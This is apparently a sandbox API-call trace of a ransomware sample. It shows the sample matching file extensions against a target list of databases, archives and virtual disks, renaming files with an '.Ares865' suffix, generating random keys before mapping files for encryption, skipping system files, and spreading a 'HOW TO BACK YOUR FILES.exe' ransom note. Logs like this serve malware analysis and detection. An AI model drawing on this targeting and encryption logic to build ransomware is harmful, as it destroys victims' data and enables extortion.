[0082.825] lstrcmpiW (lpString1="msi", lpString2="fdb") returned 1 [0082.825] lstrlenW (lpString="fic") returned 3 [0082.825] lstrcmpiW (lpString1="msi", lpString2="fic") returned 1 [0082.825] lstrlenW (lpString="flexolibrary") returned 12 [0082.825] lstrcmpiW (lpString1="onal_x64.msi", lpString2="flexolibrary") returned 1 [0082.825] lstrlenW (lpString="fm5") returned 3 [0082.825] lstrcmpiW (lpString1="msi", lpString2="fm5") returned 1 [0082.825] lstrlenW (lpString="fmp") returned 3 [0082.825] lstrcmpiW (lpString1="msi", lpString2="fmp") returned 1 [0082.825] lstrlenW (lpString="fmp12") returned 5 [0082.825] lstrcmpiW (lpString1="4.msi", lpString2="fmp12") returned -1 [0082.825] lstrlenW (lpString="fmpsl") returned 5 [0082.825] lstrcmpiW (lpString1="4.msi", lpString2="fmpsl") returned -1 [0082.825] lstrlenW (lpString="fol") returned 3 [0082.825] lstrcmpiW (lpString1="msi", lpString2="fol") returned 1 [0082.825] lstrlenW (lpString="fp3") returned 3 [0082.825] lstrcmpiW (lpString1="msi", lpString2="fp3") returned 1 [0082.825] lstrlenW (lpString="fp4") returned 3 [0082.825] lstrcmpiW (lpString1="msi", lpString2="fp4") returned 1 [0082.825] lstrlenW (lpString="fp5") returned 3 [0082.825] lstrcmpiW (lpString1="msi", lpString2="fp5") returned 1 [0082.825] lstrlenW (lpString="fp7") returned 3 [0082.825] lstrcmpiW (lpString1="msi", lpString2="fp7") returned 1 [0082.825] lstrlenW (lpString="fpt") returned 3 [0082.825] lstrcmpiW (lpString1="msi", lpString2="fpt") returned 1 [0082.825] lstrlenW (lpString="frm") returned 3 [0082.825] lstrcmpiW (lpString1="msi", lpString2="frm") returned 1 [0082.825] lstrlenW (lpString="gdb") returned 3 [0082.826] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0082.826] lstrlenW (lpString="gdb") returned 3 [0082.826] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0082.826] lstrlenW (lpString="grdb") returned 4 [0082.826] lstrcmpiW (lpString1=".msi", lpString2="grdb") returned -1 [0082.826] lstrlenW (lpString="gwi") returned 3 [0082.826] lstrcmpiW (lpString1="msi", lpString2="gwi") returned 1 [0082.826] lstrlenW (lpString="hdb") returned 3 [0082.826] lstrcmpiW (lpString1="msi", lpString2="hdb") returned 1 [0082.826] lstrlenW (lpString="his") returned 3 [0082.826] lstrcmpiW (lpString1="msi", lpString2="his") returned 1 [0082.826] lstrlenW (lpString="ib") returned 2 [0082.826] lstrcmpiW (lpString1="si", lpString2="ib") returned 1 [0082.826] lstrlenW (lpString="idb") returned 3 [0082.826] lstrcmpiW (lpString1="msi", lpString2="idb") returned 1 [0082.826] lstrlenW (lpString="ihx") returned 3 [0082.826] lstrcmpiW (lpString1="msi", lpString2="ihx") returned 1 [0082.826] lstrlenW (lpString="itdb") returned 4 [0082.826] lstrcmpiW (lpString1=".msi", lpString2="itdb") returned -1 [0082.826] lstrlenW (lpString="itw") returned 3 [0082.826] lstrcmpiW (lpString1="msi", lpString2="itw") returned 1 [0082.826] lstrlenW (lpString="jet") returned 3 [0082.826] lstrcmpiW (lpString1="msi", lpString2="jet") returned 1 [0082.826] lstrlenW (lpString="jtx") returned 3 [0082.826] lstrcmpiW (lpString1="msi", lpString2="jtx") returned 1 [0082.826] lstrlenW (lpString="kdb") returned 3 [0082.826] lstrcmpiW (lpString1="msi", lpString2="kdb") returned 1 [0082.826] lstrlenW (lpString="kexi") returned 4 [0082.826] lstrcmpiW (lpString1=".msi", lpString2="kexi") returned -1 [0082.826] lstrlenW (lpString="kexic") returned 5 [0082.826] lstrcmpiW (lpString1="4.msi", lpString2="kexic") returned -1 [0082.826] lstrlenW (lpString="kexis") returned 5 [0082.826] lstrcmpiW (lpString1="4.msi", lpString2="kexis") returned -1 [0082.826] lstrlenW (lpString="lgc") returned 3 [0082.826] lstrcmpiW (lpString1="msi", lpString2="lgc") returned 1 [0082.826] lstrlenW (lpString="lwx") returned 3 [0082.826] lstrcmpiW (lpString1="msi", lpString2="lwx") returned 1 [0082.826] lstrlenW (lpString="maf") returned 3 [0082.827] lstrcmpiW (lpString1="msi", lpString2="maf") returned 1 [0082.827] lstrlenW (lpString="maq") returned 3 [0082.827] lstrcmpiW (lpString1="msi", lpString2="maq") returned 1 [0082.827] lstrlenW (lpString="mar") returned 3 [0082.827] lstrcmpiW (lpString1="msi", lpString2="mar") returned 1 [0082.827] lstrlenW (lpString="marshal") returned 7 [0082.827] lstrcmpiW (lpString1="x64.msi", lpString2="marshal") returned 1 [0082.827] lstrlenW (lpString="mas") returned 3 [0082.827] lstrcmpiW (lpString1="msi", lpString2="mas") returned 1 [0082.827] lstrlenW (lpString="mav") returned 3 [0082.827] lstrcmpiW (lpString1="msi", lpString2="mav") returned 1 [0082.827] lstrlenW (lpString="maw") returned 3 [0082.827] lstrcmpiW (lpString1="msi", lpString2="maw") returned 1 [0082.827] lstrlenW (lpString="mdbhtml") returned 7 [0082.827] lstrcmpiW (lpString1="x64.msi", lpString2="mdbhtml") returned 1 [0082.827] lstrlenW (lpString="mdn") returned 3 [0082.827] lstrcmpiW (lpString1="msi", lpString2="mdn") returned 1 [0082.827] lstrlenW (lpString="mdt") returned 3 [0082.827] lstrcmpiW (lpString1="msi", lpString2="mdt") returned 1 [0082.827] lstrlenW (lpString="mfd") returned 3 [0082.827] lstrcmpiW (lpString1="msi", lpString2="mfd") returned 1 [0082.827] lstrlenW (lpString="mpd") returned 3 [0082.827] lstrcmpiW (lpString1="msi", lpString2="mpd") returned 1 [0082.827] lstrlenW (lpString="mrg") returned 3 [0082.827] lstrcmpiW (lpString1="msi", lpString2="mrg") returned 1 [0082.827] lstrlenW (lpString="mud") returned 3 [0082.827] lstrcmpiW (lpString1="msi", lpString2="mud") returned -1 [0082.827] lstrlenW (lpString="mwb") returned 3 [0082.827] lstrcmpiW (lpString1="msi", lpString2="mwb") returned -1 [0082.827] lstrlenW (lpString="myd") returned 3 [0082.827] lstrcmpiW (lpString1="msi", lpString2="myd") returned -1 [0082.827] lstrlenW (lpString="ndf") returned 3 [0082.827] lstrcmpiW (lpString1="msi", lpString2="ndf") returned -1 [0082.827] lstrlenW (lpString="nnt") returned 3 [0082.827] lstrcmpiW (lpString1="msi", lpString2="nnt") returned -1 [0082.827] lstrlenW (lpString="nrmlib") returned 6 [0082.827] lstrcmpiW (lpString1="64.msi", lpString2="nrmlib") returned -1 [0082.827] lstrlenW (lpString="ns2") returned 3 [0082.827] lstrcmpiW (lpString1="msi", lpString2="ns2") returned -1 [0082.828] lstrlenW (lpString="ns3") returned 3 [0082.828] lstrcmpiW (lpString1="msi", lpString2="ns3") returned -1 [0082.828] lstrlenW (lpString="ns4") returned 3 [0082.828] lstrcmpiW (lpString1="msi", lpString2="ns4") returned -1 [0082.828] lstrlenW (lpString="nsf") returned 3 [0082.828] lstrcmpiW (lpString1="msi", lpString2="nsf") returned -1 [0082.828] lstrlenW (lpString="nv") returned 2 [0082.828] lstrcmpiW (lpString1="si", lpString2="nv") returned 1 [0082.828] lstrlenW (lpString="nv2") returned 3 [0082.828] lstrcmpiW (lpString1="msi", lpString2="nv2") returned -1 [0082.828] lstrlenW (lpString="nwdb") returned 4 [0082.828] lstrcmpiW (lpString1=".msi", lpString2="nwdb") returned -1 [0082.828] lstrlenW (lpString="nyf") returned 3 [0082.828] lstrcmpiW (lpString1="msi", lpString2="nyf") returned -1 [0082.828] lstrlenW (lpString="odb") returned 3 [0082.828] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0082.828] lstrlenW (lpString="odb") returned 3 [0082.828] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0082.828] lstrlenW (lpString="oqy") returned 3 [0082.828] lstrcmpiW (lpString1="msi", lpString2="oqy") returned -1 [0082.828] lstrlenW (lpString="ora") returned 3 [0082.828] lstrcmpiW (lpString1="msi", lpString2="ora") returned -1 [0082.828] lstrlenW (lpString="orx") returned 3 [0082.828] lstrcmpiW (lpString1="msi", lpString2="orx") returned -1 [0082.828] lstrlenW (lpString="owc") returned 3 [0082.828] lstrcmpiW (lpString1="msi", lpString2="owc") returned -1 [0082.828] lstrlenW (lpString="p96") returned 3 [0082.828] lstrcmpiW (lpString1="msi", lpString2="p96") returned -1 [0082.828] lstrlenW (lpString="p97") returned 3 [0082.828] lstrcmpiW (lpString1="msi", lpString2="p97") returned -1 [0082.828] lstrlenW (lpString="pan") returned 3 [0082.828] lstrcmpiW (lpString1="msi", lpString2="pan") returned -1 [0082.828] lstrlenW (lpString="pdb") returned 3 [0082.828] lstrcmpiW (lpString1="msi", lpString2="pdb") returned -1 [0082.828] lstrlenW (lpString="pdm") returned 3 [0082.828] lstrcmpiW (lpString1="msi", lpString2="pdm") returned -1 [0082.828] lstrlenW (lpString="pnz") returned 3 [0082.829] lstrcmpiW (lpString1="msi", lpString2="pnz") returned -1 [0082.829] lstrlenW (lpString="qry") returned 3 [0082.829] lstrcmpiW (lpString1="msi", lpString2="qry") returned -1 [0082.829] lstrlenW (lpString="qvd") returned 3 [0082.829] lstrcmpiW (lpString1="msi", lpString2="qvd") returned -1 [0082.829] lstrlenW (lpString="rbf") returned 3 [0082.829] lstrcmpiW (lpString1="msi", lpString2="rbf") returned -1 [0082.829] lstrlenW (lpString="rctd") returned 4 [0082.829] lstrcmpiW (lpString1=".msi", lpString2="rctd") returned -1 [0082.829] lstrlenW (lpString="rod") returned 3 [0082.829] lstrcmpiW (lpString1="msi", lpString2="rod") returned -1 [0082.829] lstrlenW (lpString="rodx") returned 4 [0082.829] lstrcmpiW (lpString1=".msi", lpString2="rodx") returned -1 [0082.829] lstrlenW (lpString="rpd") returned 3 [0082.829] lstrcmpiW (lpString1="msi", lpString2="rpd") returned -1 [0082.829] lstrlenW (lpString="rsd") returned 3 [0082.829] lstrcmpiW (lpString1="msi", lpString2="rsd") returned -1 [0082.829] lstrlenW (lpString="sas7bdat") returned 8 [0082.829] lstrcmpiW (lpString1="_x64.msi", lpString2="sas7bdat") returned -1 [0082.829] lstrlenW (lpString="sbf") returned 3 [0082.829] lstrcmpiW (lpString1="msi", lpString2="sbf") returned -1 [0082.829] lstrlenW (lpString="scx") returned 3 [0082.829] lstrcmpiW (lpString1="msi", lpString2="scx") returned -1 [0082.829] lstrlenW (lpString="sdb") returned 3 [0082.829] lstrcmpiW (lpString1="msi", lpString2="sdb") returned -1 [0082.829] lstrlenW (lpString="sdc") returned 3 [0082.829] lstrcmpiW (lpString1="msi", lpString2="sdc") returned -1 [0082.829] lstrlenW (lpString="sdf") returned 3 [0082.829] lstrcmpiW (lpString1="msi", lpString2="sdf") returned -1 [0082.829] lstrlenW (lpString="sis") returned 3 [0082.829] lstrcmpiW (lpString1="msi", lpString2="sis") returned -1 [0082.829] lstrlenW (lpString="spq") returned 3 [0082.829] lstrcmpiW (lpString1="msi", lpString2="spq") returned -1 [0082.829] lstrlenW (lpString="te") returned 2 [0082.829] lstrcmpiW (lpString1="si", lpString2="te") returned -1 [0082.829] lstrlenW (lpString="teacher") returned 7 [0082.829] lstrcmpiW (lpString1="x64.msi", lpString2="teacher") returned 1 [0082.829] lstrlenW (lpString="tmd") returned 3 [0082.830] lstrcmpiW (lpString1="msi", lpString2="tmd") returned -1 [0082.830] lstrlenW (lpString="tps") returned 3 [0082.830] lstrcmpiW (lpString1="msi", lpString2="tps") returned -1 [0082.830] lstrlenW (lpString="trc") returned 3 [0082.830] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0082.830] lstrlenW (lpString="trc") returned 3 [0082.830] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0082.830] lstrlenW (lpString="trm") returned 3 [0082.830] lstrcmpiW (lpString1="msi", lpString2="trm") returned -1 [0082.830] lstrlenW (lpString="udb") returned 3 [0082.830] lstrcmpiW (lpString1="msi", lpString2="udb") returned -1 [0082.830] lstrlenW (lpString="udl") returned 3 [0082.830] lstrcmpiW (lpString1="msi", lpString2="udl") returned -1 [0082.830] lstrlenW (lpString="usr") returned 3 [0082.830] lstrcmpiW (lpString1="msi", lpString2="usr") returned -1 [0082.830] lstrlenW (lpString="v12") returned 3 [0082.830] lstrcmpiW (lpString1="msi", lpString2="v12") returned -1 [0082.830] lstrlenW (lpString="vis") returned 3 [0082.830] lstrcmpiW (lpString1="msi", lpString2="vis") returned -1 [0082.830] lstrlenW (lpString="vpd") returned 3 [0082.830] lstrcmpiW (lpString1="msi", lpString2="vpd") returned -1 [0082.830] lstrlenW (lpString="vvv") returned 3 [0082.830] lstrcmpiW (lpString1="msi", lpString2="vvv") returned -1 [0082.830] lstrlenW (lpString="wdb") returned 3 [0082.830] lstrcmpiW (lpString1="msi", lpString2="wdb") returned -1 [0082.830] lstrlenW (lpString="wmdb") returned 4 [0082.830] lstrcmpiW (lpString1=".msi", lpString2="wmdb") returned -1 [0082.830] lstrlenW (lpString="wrk") returned 3 [0082.830] lstrcmpiW (lpString1="msi", lpString2="wrk") returned -1 [0082.830] lstrlenW (lpString="xdb") returned 3 [0082.830] lstrcmpiW (lpString1="msi", lpString2="xdb") returned -1 [0082.830] lstrlenW (lpString="xld") returned 3 [0082.830] lstrcmpiW (lpString1="msi", lpString2="xld") returned -1 [0082.830] lstrlenW (lpString="xmlff") returned 5 [0082.830] lstrcmpiW (lpString1="4.msi", lpString2="xmlff") returned -1 [0082.830] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.Ares865") returned 154 [0082.830] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.ares865"), dwFlags=0x1) returned 1 [0082.834] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0082.835] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=151552) returned 1 [0082.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0082.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0082.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0082.835] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0082.836] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0082.836] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0082.836] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x25300, lpName=0x0) returned 0x15c [0082.839] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x25300) returned 0x420000 [0082.850] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0082.851] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0082.851] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0082.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0082.851] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0082.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0082.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0082.851] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0082.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0082.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0082.852] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0082.852] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0082.852] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0082.852] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0082.853] CloseHandle (hObject=0x15c) returned 1 [0082.853] CloseHandle (hObject=0x118) returned 1 [0082.853] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0082.853] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0082.853] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0082.854] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4374a500, ftCreationTime.dwHighDateTime=0x1ced4da, ftLastAccessTime.dwLowDateTime=0x4374a500, ftLastAccessTime.dwHighDateTime=0x1ced4da, ftLastWriteTime.dwLowDateTime=0x4374a500, ftLastWriteTime.dwHighDateTime=0x1ced4da, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0082.854] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0082.854] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0082.854] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" [0082.854] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfda8 | out: hHeap=0x2b0000) returned 1 [0082.854] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0082.854] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned 71 [0082.854] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" [0082.854] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0082.854] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0082.855] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0082.855] GetLastError () returned 0x0 [0082.855] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0082.855] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0082.855] CloseHandle (hObject=0x120) returned 1 [0082.855] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0082.855] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0082.856] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c27d800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0082.856] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0082.856] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0082.856] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.856] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c27d800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.856] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0082.856] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0082.856] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.856] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.856] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c27d800, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0082.856] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0082.856] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecd314a0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd314a0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xf08b3aa0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x28e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0082.856] lstrcmpiW (lpString1="state.rsm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0082.856] lstrcmpiW (lpString1="state.rsm", lpString2="aoldtz.exe") returned 1 [0082.856] lstrcmpiW (lpString1="state.rsm", lpString2=".") returned 1 [0082.856] lstrcmpiW (lpString1="state.rsm", lpString2="..") returned 1 [0082.856] lstrcmpiW (lpString1="state.rsm", lpString2="windows") returned -1 [0082.856] lstrcmpiW (lpString1="state.rsm", lpString2="bootmgr") returned 1 [0082.856] lstrcmpiW (lpString1="state.rsm", lpString2="temp") returned -1 [0082.856] lstrcmpiW (lpString1="state.rsm", lpString2="pagefile.sys") returned 1 [0082.856] lstrcmpiW (lpString1="state.rsm", lpString2="boot") returned 1 [0082.856] lstrcmpiW (lpString1="state.rsm", lpString2="ids.txt") returned 1 [0082.856] lstrcmpiW (lpString1="state.rsm", lpString2="ntuser.dat") returned 1 [0082.856] lstrcmpiW (lpString1="state.rsm", lpString2="perflogs") returned 1 [0082.856] lstrcmpiW (lpString1="state.rsm", lpString2="MSBuild") returned 1 [0082.856] lstrlenW (lpString="state.rsm") returned 9 [0082.856] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*") returned 73 [0082.856] lstrcpyW (in: lpString1=0x2cce490, lpString2="state.rsm" | out: lpString1="state.rsm") returned="state.rsm" [0082.856] lstrlenW (lpString="state.rsm") returned 9 [0082.856] lstrlenW (lpString="Ares865") returned 7 [0082.856] lstrcmpiW (lpString1="ate.rsm", lpString2="Ares865") returned 1 [0082.857] lstrlenW (lpString=".dll") returned 4 [0082.857] lstrcmpiW (lpString1="state.rsm", lpString2=".dll") returned 1 [0082.857] lstrlenW (lpString=".lnk") returned 4 [0082.857] lstrcmpiW (lpString1="state.rsm", lpString2=".lnk") returned 1 [0082.857] lstrlenW (lpString=".ini") returned 4 [0082.857] lstrcmpiW (lpString1="state.rsm", lpString2=".ini") returned 1 [0082.857] lstrlenW (lpString=".sys") returned 4 [0082.857] lstrcmpiW (lpString1="state.rsm", lpString2=".sys") returned 1 [0082.857] lstrlenW (lpString="state.rsm") returned 9 [0082.857] lstrlenW (lpString="bak") returned 3 [0082.857] lstrcmpiW (lpString1="rsm", lpString2="bak") returned 1 [0082.857] lstrlenW (lpString="ba_") returned 3 [0082.857] lstrcmpiW (lpString1="rsm", lpString2="ba_") returned 1 [0082.857] lstrlenW (lpString="dbb") returned 3 [0082.857] lstrcmpiW (lpString1="rsm", lpString2="dbb") returned 1 [0082.857] lstrlenW (lpString="vmdk") returned 4 [0082.857] lstrcmpiW (lpString1=".rsm", lpString2="vmdk") returned -1 [0082.857] lstrlenW (lpString="rar") returned 3 [0082.857] lstrcmpiW (lpString1="rsm", lpString2="rar") returned 1 [0082.857] lstrlenW (lpString="zip") returned 3 [0082.857] lstrcmpiW (lpString1="rsm", lpString2="zip") returned -1 [0082.857] lstrlenW (lpString="tgz") returned 3 [0082.857] lstrcmpiW (lpString1="rsm", lpString2="tgz") returned -1 [0082.857] lstrlenW (lpString="vbox") returned 4 [0082.857] lstrcmpiW (lpString1=".rsm", lpString2="vbox") returned -1 [0082.857] lstrlenW (lpString="vdi") returned 3 [0082.857] lstrcmpiW (lpString1="rsm", lpString2="vdi") returned -1 [0082.857] lstrlenW (lpString="vhd") returned 3 [0082.857] lstrcmpiW (lpString1="rsm", lpString2="vhd") returned -1 [0082.857] lstrlenW (lpString="vhdx") returned 4 [0082.857] lstrcmpiW (lpString1=".rsm", lpString2="vhdx") returned -1 [0082.857] lstrlenW (lpString="avhd") returned 4 [0082.857] lstrcmpiW (lpString1=".rsm", lpString2="avhd") returned -1 